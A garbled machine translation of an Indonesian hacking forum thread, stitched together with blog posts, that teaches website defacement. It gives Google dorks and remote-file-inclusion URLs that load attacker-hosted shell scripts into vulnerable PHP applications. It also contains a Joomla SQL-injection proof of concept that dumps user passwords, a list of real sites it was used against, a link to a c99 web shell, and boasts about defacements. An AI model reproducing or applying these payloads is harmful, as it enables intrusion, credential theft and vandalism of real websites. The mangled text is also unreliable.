How to hack the website site kaskus.

us Indonesia reaver attack United States

Address : jl bahagia kereo selatan ciledug tangerang banten indonesia

I want to share experiences on-nge Deface various command and command that are
useful for us in the nge-Deface ..

Oke deh ga need berpanjang wide DEFACE what .... wong cuman we learn how to enter
into a web in which there bug or error in the error that there is a script or link it ..

www.kaskus.us forum.detik.com acehforum.or.id wilkpedia.org

indonesiaindonesia.com kafegaul.com liputan6.com ilmukomputer.org
indonesiar.com Site internet communication network and the movement of cultural
anti-communism United States merebak communication network in Indonesia and
Singapore the target australia United States
Lautranindonesia.com

Before we start the better we mengetahwi various Command command that are useful for
us ..

cd = namadirectory Viewing a directory

ls-al = See More In One Directory more
fined Directory directory = check
cat = Reading A File
Uploading a wget = Files
tar-zxvf = MengExtraxt a files in the
tgz
pwd = Is Knowing Where We Being Directory
uname-a = existence of a path is
w = Only Knowing Who has been using the Shell.

Ok we start with PHP because PHP is much BuG .. of them:

- Oneadmin

You enter in the Google Search Keywords oneadmin site:. Com / oneadmin site:. Net
nah now I give the example paths http://target.com/oneadmin/config.php?path ...
[docroot] =

Example:
http://target.com/oneadmin/config.php?path [docroot] =
http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname-a; cd, pwd, ls-al

- PnPhpBB2

You enter in the Google Search Keywords modules.php powered by pnphpbb2 site:. Com
/ modules.php pnphpbb2 site powered by:. Net or whatever you like or want ...

nah now I give the example paths ...

http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path =

Example:
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_p
ath=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname% 20-a; cd; pwd

- Support Ticket

You enter in the Google Search Keywords include / main.php site:. Com / include /
main.php site:. Net or whatever you like or want ...
nah now I give the example paths http://target.com/include/main.php?config ...
[search_disp] = true & include_dir =

Example: http://target.com/include/main.php?config ... [search_disp] = true &

include_dir http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname =-a; cd,
pwd, ls -- al

Hehehe Fair many eh? Well happy to try it ..

Neh I put some of that I have successfully Deface ..

http://vampiredirectory.com/hackbalinese.htm
http://stolenwings.com/hackbalinese.htm
http://miserygirl.com/hackbalinese.htm
http://dashfilms.com/hackbalinese.htm

Visit our Web site in www.bali-source.net

Copyright 2005 by # balinesehacker Crew

Join my Channel at # balinesehacker Mirc.dal.net

What ... salam kenal from MR.R0cks ..

Special Thax's to ...

dEdE_DeFaN-Malanghack.net-Arakbali-SKYstRom

(fraudulent ngambil dr bali site: P)

asa17
04-08-2006, 09:33 AM
tuch okay, not first learned yach, ntar kl kan get confused Leh
Jourdan
04-08-2006, 12:02 PM
swt, gwe never read the article in nieh what hack.com gitu

jambi_hack kayanya
dede23
04-08-2006, 03:14 PM
@ jour
(fraudulent ngambil dr bali site)

forget his site wa

asa17
09-08-2006, 10:30 AM
I learn new temen2 nich, I can have a bantu ng, when I use the metasploit framework has
been completed and the command error appears like this
WARNING: Socket error: Connection failed: Operation now in progress at / home
/ framework / lib / Pex / DCERPC.pm line 825.
what is wrong ... if ya on my computer what is laen, I love enlightenment
thank
Jourdan
10-08-2006, 07:22 PM
oh yes, koq jambi_hack ... bali_hack ding: P
Th0R
10-08-2006, 07:27 PM
/ swt / swt / swt
Why dont u just use that kind of RFI to use the c99 or r57?
Then just easily upload shells on it? LOL
Why do we need to deface something which Vulnerable enough to be taken over?

And i do believe there is something that u need to patch on the site of http://www.bali-
source.net
Critical Not quite .. But believe vulnerabilities kinda annoying ..

Thanks.
Th0R
kodoks
17-08-2006, 07:00 PM
/ swt / swt / swt
Why dont u just use that kind of RFI to use the c99 or r57?
Then just easily upload shells on it? LOL
Why do we need to deface something which Vulnerable enough to be taken over?

And i do believe there is something that u need to patch on the site of http://www.bali-
source.net
Critical Not quite .. But believe vulnerabilities kinda annoying ..

Thanks.
Th0R
Damn ... its right!
but where i can find them? i forget the link to download c99sh.php / pif!
c99sh is a php shell, which you can make someone mengrayangi webserver
its requirements: Dolo this must be uploaded to the webserver!
DL: http://rapidshare.de/files/9548673/C99sh.zip.html
I would like to give a demo, but will be a web .... gw pake ngedeface some of this site,
and how little naive.
green_kid
27-08-2006, 04:02 PM
Thanks also useful lumayan / hmm
dede23
27-08-2006, 04:07 PM
sama2 kk .......
kodoks
28-08-2006, 06:55 PM
sama2 kk .......
boz, ud have the same upload ente gak c99sh / sob ... gw pengen obok2 ne / gg / gg / gg
TequilaSunrise
06-09-2006, 08:52 PM
--- Quote ---

cd = namadirectory Viewing a directory

-> Correction: cd = change directory, move to the directory you referred to, and not see.

ls-al = See More In One Directory more

-> Correction:-a = all files including hidden files * nix (the file you start with the point)
-l = long listing (show long list), so not to see more in the (recursive)

fined Directory directory = check

-> No comment, aja blom pernah dengar.

Uploading a wget = Files

-> Correction: wget to download, together with flashget in windows

uname-a = existence of a path is

-> Correction: to print this information system, the kernel version etc.

PS: all the above is the Linux / * nix / * BSD

- Oneadmin

--- End quote ---

Tequila!
Gloria
13-09-2006, 06:54 PM
I ngerti / swt I learn the best i / gg / no1
http://target.com/oneadmin/config.php?path [docroot] =
Where docroot /? / swt I Pengen Nge Deface Web Skull Fuck Is Web
(http://www.telkomsekolah-online.net/sekolah.php?pathcd)
kyuzu
13-09-2006, 08:01 PM
ne, according to a hacking ma bulshit ...>!!!!

fact so, it's only org yg dalem capable of hacking, do outside mane tau, klo gw bikin gw
pake logaritmany square logarithm, so ibaratnye, to access the webadmin, fit 10x need,
what you hack?

bruce attack on <<<days of ancient

What a tumultuous aje on this:

DoS router <<<new mantab / no1
IMAN_MANIAKS
05-10-2006, 02:26 PM
i try to go to batam !!!!,,, udh hackers have been msk LOM !???? klo si dede 23 mah!
bullshit abissssss
IMAN_MANIAKS
05-10-2006, 02:32 PM
Ehh I can! try to deface this site anathema => shit sites (lautan.indosiar.com)
D-cracker
10-10-2006, 08:12 PM
Hr Gene LI /? I Zaman / swt Lu msk Web dech His Iraq Terrorist Or Send Nggak
BackDoor / Trojan Horse to USA Defense Dept. / gg
itlust
10-10-2006, 09:29 PM
deface it essentially a matter of finding a bug in the web page and exploit weaknesses ...
right?
D-cracker
12-10-2006, 10:06 AM
What have Nggak Sih Which Yg Bikin Thread, Nyuspin Back Door to the Web?
Th1R
12-10-2006, 10:09 AM
D-kan hacker cracker, why not make threadnya fella?

Ayo I awaited his tutor ...

GYIHIHIHIHIHIHH
D-cracker
12-10-2006, 07:10 PM
D-kan hacker cracker, why not make threadnya fella?

Ayo I awaited his tutor ...

GYIHIHIHIHIHIHH
__________________
Thanks,
Th1R
Lu Gw IP Check Yes / pmg Tau Sapa Lu *** r@binus.com /? <- Understand What I
Mean? Yes I Emang Bener UD / heh Welcome In IF / gg
kurei
09-04-2007, 11:02 AM
wah ............ ga ampe now I can ngedeface web,,,,
kodoks
09-04-2007, 11:15 AM
command2 is over a Linux server ...
What Files and Folders to its PAKE chmod 777 bakalan road ...
stay that way pakein be over I = BLAH ... ANCUR kabeh THE WEB:))

Mangkanya, before ngedeface / hack web ...

lo musti tau, Type OS, etc. .. Document Root biar gak wiriness important but ....!
zoiz
09-04-2007, 11:21 AM
OO .. Th0r kok yah banned in here? Sorry still new:)

Regard,

zoiz
vBulletin ® v3.8.3, Copyright

Hack webste

Joomla component Joomradio

Add comments

################################################
##
# Joomradio Joomla Component Remote SQL Injection #
##
################################################## #######

########################################
[*] Contact: patrolicyber [at] yahoo.com
[*] Greetz: All friends & muslims Hackers:)
########################################

[*] Script_Name: "Joomla"

[*] Component_Name: "com_joomradio"

########################################

[*] Dork: inurl: com_joomradio

########################################

[*] Poc 1: / index.php? Option = com_joomradio & page = show_radio & id = (SQL)
[*] Example: / index.php? Option = com_joomradio & page = show_radio & id =- 1
UNION SELECT user (), concat (username, 0 × 3a, password), user (), user (), user (),
user () , user () FROM jos_users -

[*] Poc 2: / index.php? Option = com_joomradio & page = show_video & id = (SQL)
[*] Example: / index.php? Option = com_joomradio & page = show_video & id =- 1
UNION SELECT user (), concat (username, 0 × 3a, password), user (), user (), user (),
user () , user () FROM jos_users -
########################################

# Milw0rm.com [2008-06-03]

results
http://www.mala-lisa.com/index.php?option=com_joomradio&page=show_video&id=-
1% 20UNION% 20SELECT% 20user (), concat (username, 0 × 3a, password), user (),
user ( ), user (), user (), user ()% 20from% 20jos_users -

http://www.port.ba/index.php?option=com_joomradio&page=show_video&id=-1%
20UNION% 20SELECT% 20user (), concat (username, 0 × 3a, password), user (), user
(), user (), user (), user ()% 20from% 20jos_users -

http://www.neele.com/start/index.php?option=com_joomradio&page=show_video&id=-
1% 20UNION% 20SELECT% 20user (), concat (username, 0 × 3a, password), user (),
user ( ), user (), user (), user ()% 20from% 20jos_users -
http://www.francemedianet.com/index.php?option=com_joomradio&page=show_video&
id=-1% 20UNION% 20SELECT% 20user (), concat (username, 0 × 3a, password), user
(), user (), user (), user (), user ()% 20from% 20jos_users -

http://www.indeaparis.com/index.php?option=com_joomradio&page=show_video&id=-
1% 20UNION% 20SELECT% 20user (), concat (username, 0 × 3a, password), user (),
user (), user (), user (), user ()% 20from% 20jos_users -

http://www.causescommunes.com/SousDomaines/radio/index.php?option=com_joomradi
o&page=show_video&id=-1% 20UNION% 20SELECT% 20user (), concat (username, 0
× 3a, password), user (), user (), user (), user (), user ()% 20from% 20jos_users -

http://www.latitud2000.com/index.php?option=com_joomradio&page=show_video&id=-
1% 20UNION% 20SELECT% 20user (), concat (username, 0 × 3a, password), user (),
user (), user (), user (), user ()% 20from% 20jos_users -

posted by patrolicyber

Easy ways Deface Web Via RFI

Article, September 15th, 2008 Hacking, Tutorial, Vuln 10 Comments

Easy ways Deface Remote File Include

Before we start the better we mengetahwi various Command command that are useful for
us ..
cd = namadirectory Viewing a directory
ls-al = See More In One Directory more
find again the Directory directory =
cat = Reading A File
Uploading a wget = Files
tar-zxvf = MengExtraxt a tgz files in the
pwd = Is Knowing Where We Being Directory
uname-a = existence of a path is
w = Only Knowing Who has been using the Shell.
download url = curl
[EvilShellInject] = inject rshell / c99 you
Ok we start with PHP because PHP is much BuG .. of them:
Googling ajah, previous RFI in the first search http://www.milw0rm.com
- Site Oneadmin RFI
You enter in the Google Search Keywords oneadmin site:. Com / oneadmin site: com
nah now I give the example paths http://target.com/oneadmin/config.php?path ...
[docroot] =
Example:
http://target.com/oneadmin/config.php?path [docroot] = [EvilShellInject]
- PnPhpBB2
You enter in the Google Search Keywords modules.php powered by pnphpbb2 site:. Com
/ modules.php pnphpbb2 site powered by:. Net or whatever you like or want ...
nah now I give the example paths ...
http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path =
[EvilShellInject]
Example:
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_p
ath = [EvilShellInject]
- Support Ticket
You enter in the Google Search Keywords include / main.php site:. Com / include /
main.php site:. Net or whatever you like or want ...
nah now I give the example paths http://target.com/include/main.php?config ...
[search_disp] = true & include_dir =
Example: http://target.com/include/main.php?config ... [search_disp] = true &
include_dir = [EvilShellInject]
Hehehe Fair many eh? Well happy to try it ..
Neh I put some of that I have successfully Deface ..
Well after that buadlah sebuad file: index.html
Fill with:
<html>
You Hacked by Name
</ html>
Then upload the file to deh directorynya
and open the website which has been deface:
http://target.com/lokasipathnya/index.html
Enjoy

10 Responses to "How To Deface Web Easy Via RFI"

• fadlie 23 October 2008
good article
• good 4 November 2008
> tukar